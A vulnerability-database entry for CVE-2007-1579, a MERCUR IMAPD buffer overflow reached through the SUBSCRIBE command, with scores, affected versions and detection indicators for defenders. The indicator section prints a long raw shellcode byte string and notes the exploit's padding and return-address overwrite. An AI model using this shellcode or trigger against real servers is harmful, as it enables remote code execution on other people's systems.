cbcvebase.
CVE-2007-1579
published 2007-03-21

CVE-2007-1579: Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.

PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
56.21%
98.9th percentile
Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.

Affected

2 ranges
VendorProductVersion rangeFixed in
atrium_softwaremercur_messaging_2005
atrium_softwaremercur_messaging_2005

Detection & IOCsextracted from sources · hover to see the quote

port143
commanda001 LOGIN <username> <password>
bytes
\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4\xa1\x39\xec\x83\xeb\xfc\xe2\xf4\x58\x49\x7d\xec\xa4\xa1\xb2\xa9\x98\x2a\x45\xe9\xdc\xa0\xd6\x67\xeb\xb9\xb2\xb3\x84\xa0\xd2\xa5\x2f\x95\xb2\xed\x4a\x90\xf9\x75\x08\x25\xf9\x98\xa3\x60\xf3\xe1\xa5\x63\xd2\x18\x9f\xf5\x1d\xe8\xd1\x44\xb2\xb3\x80\xa0\xd2\x8a\x2f\xad\x72\x67\xfb\xbd\x38\x07\x2f\xbd\xb2\xed\x4f\x28\x65\xc8\xa0\x62\x08\x2c\xc0\x2a\x79\xdc\x21\x61\x41\xe0\x2f\xe1\x35\x67\xd4\xbd\x94\x67\xcc\xa9\xd2\xe5\x2f\x21\x89\xec\xa4\xa1\xb2\x84\x98\xfe\x08\x1a\xc4\xf7\xb0\x14\x27\x61\x42\xbc\xcc\x51\xb3\xe8\xfb\xc9\xa1\x12\x2e\xaf\x6e\x13\x43\xc2\x54\x88\x8a\xc4\x41\x89\x84\x8e\x5a\xcc\xca\xc4\x4d\xcc\xd1\xd2\x5c\x9e\x84\xd9\x19\x94\x84\x8e\x78\xa8\xe0\x81\x1f\xca\x84\xcf\x5c\x98\x84\xcd\x56\x8f\xc5\xcd\x5e\x9e\xcb\xd4\x49\xcc\xe5\xc5\x54\x85\xca\xc8\x4a\x98\xd6\xc0\x4d\x83\xd6\xd2\x19\x94\x84\x8e\x78\xa8\xe0\xa1\x39\xec
  • Trigger is an IMAP SUBSCRIBE command sent after authentication; monitor for oversized SUBSCRIBE payloads on TCP/143 targeting Atrium MERCUR IMAPD.
  • The exploit payload is padded with repeated 'L' bytes after the shellcode before the return address overwrite; large SUBSCRIBE payloads containing repetitive padding bytes are a strong indicator of exploitation.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.